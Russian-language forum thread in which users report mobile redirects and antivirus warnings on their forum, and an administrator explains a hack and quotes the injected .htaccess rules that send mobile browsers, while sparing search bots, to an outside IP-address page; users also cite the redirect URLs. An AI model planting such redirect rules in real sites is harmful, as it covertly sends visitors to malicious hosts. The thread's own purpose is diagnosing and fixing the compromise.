Александр с Якутии Опубликовано 30 марта, 2013 Поделиться Опубликовано 30 марта, 2013 Я пошел другим путем и в настройки браузера не лез. На самом деле всё просто оказалось. http://s019.radikal.ru/i606/1303/bf/bdb25fefb301.jpg В низу форума есть функция "удалить установленные форумом куки", нажал на неё пару раз, потом вбил пароль. Как результат, захожу неделю на форум со всех устройств и всё нормально, никто не чего не просит ) Ссылка на комментарий Поделиться на другие сайты Поделиться
Александр с Якутии Опубликовано 20 апреля, 2013 Поделиться Опубликовано 20 апреля, 2013 Выручайте. С мобильного зайти не могу. Вот что выдает Ссылка на комментарий Поделиться на другие сайты Поделиться
Sergey Chesak Опубликовано 20 апреля, 2013 Поделиться Опубликовано 20 апреля, 2013 Ст2ст Это выдает зачастую китаЁское уЁ. Нормальные, брендовые девайсы хавают все куки форума и даже не икают. Ссылка на комментарий Поделиться на другие сайты Поделиться
Александр с Якутии Опубликовано 20 апреля, 2013 Поделиться Опубликовано 20 апреля, 2013 В том то и дело, что это не китаец, а флагман ! Все ресурсы открываются кроме пограничника, на двух браузерах проверил. Единственное если на встроенном браузере поставить галочку "версия для пк" то в этом виде открывает. Ссылка на комментарий Поделиться на другие сайты Поделиться
Игорь Турикин Опубликовано 20 апреля, 2013 Поделиться Опубликовано 20 апреля, 2013 Проверяйте.. Ссылка на комментарий Поделиться на другие сайты Поделиться
Эсаул Опубликовано 20 апреля, 2013 Поделиться Опубликовано 20 апреля, 2013 Каспер блокирует вход- кричит вредоносные ссылки!!! Ссылка на комментарий Поделиться на другие сайты Поделиться
Игорь Турикин Опубликовано 20 апреля, 2013 Поделиться Опубликовано 20 апреля, 2013 Каспер блокирует вход- кричит вредоносные ссылки!!!Каспер еще не в курсе.. Ссылка на комментарий Поделиться на другие сайты Поделиться
Sergey Chesak Опубликовано 20 апреля, 2013 Поделиться Опубликовано 20 апреля, 2013 (изменено) Слухайте, при чем тут администрация?Уже год как я сменил китаёзу на нормального деву (а-ка LT15 от Sony уже) и не разу не возникало траблов, что бы что то не открывалось. Что не было ни разу в том киттаёзе. Точно так же запрашивал; то брузер обнови, то прогу поставь, то вообще... меняй тело Изменено 20 апреля, 2013 пользователем Vakula Ссылка на комментарий Поделиться на другие сайты Поделиться
Эсаул Опубликовано 20 апреля, 2013 Поделиться Опубликовано 20 апреля, 2013 (изменено) Меня со стационарного не пускает! Запрещено, загрузка объекта, содержащего вредоносную ссылку.Вот отчёт Каспера:Не смог вставить-Каспер половину кнопок заблокировал, в том числе и загрузку изображений. 453 вредоносные ссылки! Изменено 20 апреля, 2013 пользователем Эсаул Ссылка на комментарий Поделиться на другие сайты Поделиться
Игорь Турикин Опубликовано 20 апреля, 2013 Поделиться Опубликовано 20 апреля, 2013 Меня со стационарного не пускает! Запрещено, загрузка объекта, содержащего вредоносную ссылку.Вот отчёт Каспера:Не смог вставить-Каспер половину кнопок заблокировал, в том числе и загрузку изображений. 453 вредоносные ссылки!Похоже, что эта фобия только у Каспера...Слухайте, при чем тут администрация?Да нет, Серега.. взлом был.. в 15:00 уже все исправлено... Бывает.. )) Это же интернет... Ссылка на комментарий Поделиться на другие сайты Поделиться
Бч-4 Волга Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 Меня со стационарного не пускает! Запрещено, загрузка объекта, содержащего вредоносную ссылку.Вот отчёт Каспера:Не смог вставить-Каспер половину кнопок заблокировал, в том числе и загрузку изображений. 453 вредоносные ссылки!У меня вчера после 18 00 Каспер блокирует заход, и до настоящего времени. Ссылка на комментарий Поделиться на другие сайты Поделиться Награды
старый краб Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 Любопытно, сегодня в 05.20 по местному, смотрел галерею знаки, исключал из своего рисунка. схожесть для 95 МЧ ПВ. Каспер запищал. сетевая атака. делал перезагрузку. в это время на скайп Сад вызывал. страница висит без движения. мышки нет. отключил и вот только смог войти обратно. Понять не могу. сетевых уже 365. как от этого избавиться? Ссылка на комментарий Поделиться на другие сайты Поделиться
Александр с Якутии Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 (изменено) Слухайте, при чем тут администрация?Уже год как я сменил китаёзу на нормального деву (а-ка LT15 от Sony уже) и не разу не возникало траблов, что бы что то не открывалось. Что не было ни разу в том киттаёзе. Точно так же запрашивал; то брузер обнови, то прогу поставь, то вообще... меняй тело если у тебя нет проблемы, не означает, что у других её не должно бытьЯ же тебе сказал флагман, сколько еще раз повторить ! Если у меня появляется проблема, то как в следствии у половины форумчан происходит тоже самое, проверено временем. Дело не в китайцах сейчас, кстати не все что китайское гомно.Проверяйте..Не идет.Игорь может это поможет, сначала переходит пограничник сюда _http://37.1.195.198/got.php?sid=1, вроде не ошибся, а потом туда _http://onllineb.com/ Не заходил с ПК не смотрел, ну их )))как от этого избавиться?Только смириться Александр Изменено 21 апреля, 2013 пользователем Ст2ст Ссылка на комментарий Поделиться на другие сайты Поделиться
Владимир Петрунин Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 Выручайте. С мобильного зайти не могу. Вот что выдаетНе идет.Игорь может это поможет, сначала переходит пограничник сюда _http://37.1.195.198/got.php?sid=1, вроде не ошибся, а потом туда _http://onllineb.com/ Не заходил с ПК не смотрел, ну их )))Владимир, маякни как у тебя проблема исчезнит вот в этой теме тех. поддержкаВчера проблемка рассосалась а сегодня тож самое какаято хрень мене как МТС навязывает всякие услуги потом дерет деньги (вы только подумали а мы уже сняли с вас деньги МТС на шаг в переди ,,,девиз компании ,,,) пока ждем улудьшения вирусник стоит Доктор Веб всю ночь гонял телефон чисто Ссылка на комментарий Поделиться на другие сайты Поделиться
Игорь Турикин Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 Не идет.Игорь может это поможет, сначала переходит пограничник сюда _http://37.1.195.198/got.php?sid=1, вроде не ошибся, а потом тудаНаписал в техподдержку. Сам не справился. Поглядим что ответят.Вчера я вылечил переписанные файлы в 15.. в 18 их опять ломанули... дописали в файл:RewriteEngine onRewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk) [NC]RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]RewriteRule (.*) h ttp://37.1.195.198/low.php?sid=1 [L,R=302]#End // КонецТо есть конкретно, это направлено на мобильные браузеры...Прошу немного терпения. Я пока оставил файлы как есть, чтоб дать техподдержке возможность разобраться. Ссылка на комментарий Поделиться на другие сайты Поделиться
Александр с Якутии Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 пока ждем улудьшения вирусник стоит Доктор Веб всю ночь гонял телефон чистоА у меня вчера нашел, хотя подобного не чего не качал и не куда не ходил тем более, наверно всему виной повышенная солнечная активность ) Ссылка на комментарий Поделиться на другие сайты Поделиться
Игорь Турикин Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 А у меня вчера нашелДату создания этого апк глянь.. не думаю, что он прилетел с ломаной ссылки Пограничника..Я у себя тоже прогонял др.вебом, но он ничего не нашел...Но др.веб я не использую все время, только в ручном режиме. Он конечно классно озвучен, но туповат.. и как-то раз половину системных файлов определил как вирусные.. удаление/установка вернула ему мозг, но для меня он стал вторичным..Сейчас использую ТОЛЬКО "TrustGo" - никаких левых срабатываний, никакого бдыч с перезарядкой.. Прогнал еще раз Др.Вебом.. для скриншота... Ссылка на комментарий Поделиться на другие сайты Поделиться
Александр с Якутии Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 (изменено) Не нашел,где дату создания глянуть. Да у меня самого много нареканий к данномуантивирусу, но из всех что ставил, остановился на нем. Авира доверия невнушила, а другие платные - уж больного много хотят. Прокрутил мысли, похожийплеер я ставил и потом снёс, почему он его тогда за вирус не посчитал при установке, а через неделю спохватился только, когда его давно нет уже, странно, хотя до этого проверял, ставлю которым ты пользуешься. А Д.вэб досвидания ) Изменено 21 апреля, 2013 пользователем Ст2ст Ссылка на комментарий Поделиться на другие сайты Поделиться
Александр с Якутии Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 Видать тех. поддержка устранила причину. У меня ысе заработало с телефона.)) Ссылка на комментарий Поделиться на другие сайты Поделиться
Игорь Турикин Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 Ну вот и все... дыра найдена. Техподдержка сработала очень профессионально.Проверьте пожалуйста доступ с мобилок.... у меня работает. Ссылка на комментарий Поделиться на другие сайты Поделиться
Sergey Chesak Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 Да нет, Серега.. взлом был.. в 15:00 уже все исправлено...О как?! если у тебя нет проблемы, не означает, что у других её не должно быть Не стоит так грубо реагироватьНу вот и все... дыра найдена. Проверьте пожалуйста доступ с мобилок.... у меня работает.Это радует. Только у меня как было, так и есть. В смысле - работает. Я правда никаких др.вебов не использую.Вотпрос ещё вот в чем; зависит ли через какой канал заходишь в инет с андрюши. GPRS или же по Wi-Fi сети прова??? Ссылка на комментарий Поделиться на другие сайты Поделиться
Эсаул Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 Игорь!Щас на майле скину тебе отчёт Каспера в текстовом. Постоянно матерится и все картинки блокирует, ссылаясь на то, что сайт вредоносный. Ссылка на комментарий Поделиться на другие сайты Поделиться
Александр с Якутии Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 Сергей с Николаева, когда проблемы с ресурсом то тебя в сети нет, а когда ты появляешься то все уже работает))) как то так наверно.Игорь, схожая проблема появилась, опять перенапоавляет, сейчас я по сети gprs, вдруг это важно. Ссылка на комментарий Поделиться на другие сайты Поделиться
Игорь Турикин Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 Игорь, схожая проблема появилась, опять перенапоавляет, сейчас я по сети gprs, вдруг это важно.Да, это важно! Благодарю!Игорь!Щас на майле скину тебе отчёт Каспера в текстовом. Постоянно матерится и все картинки блокирует, ссылаясь на то, что сайт вредоносный.Давай... Ссылка на комментарий Поделиться на другие сайты Поделиться
Sergey Chesak Опубликовано 21 апреля, 2013 Поделиться Опубликовано 21 апреля, 2013 Сергей, когда проблемы с ресурсом то тебя в сети нет, а когда ты появляешься то все уже работает))) как то так наверно.Я в сети сейчас практически постоянно. Дома стационар работает (иногда сутками напролет), на работе ноут весь день пыхтит. И как бы там на меня не смотрели, одна из открытых вкладок (а-ка forum.pogranichnik.ru) всегда висит в автообновлении на 5 минут.Да, это важно!О, так GPRS сеть подставляет пользователей ресурса. Точно так же у меня было на смарте китайском. Наобновлялся так, что пришлось прошивку менять. Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения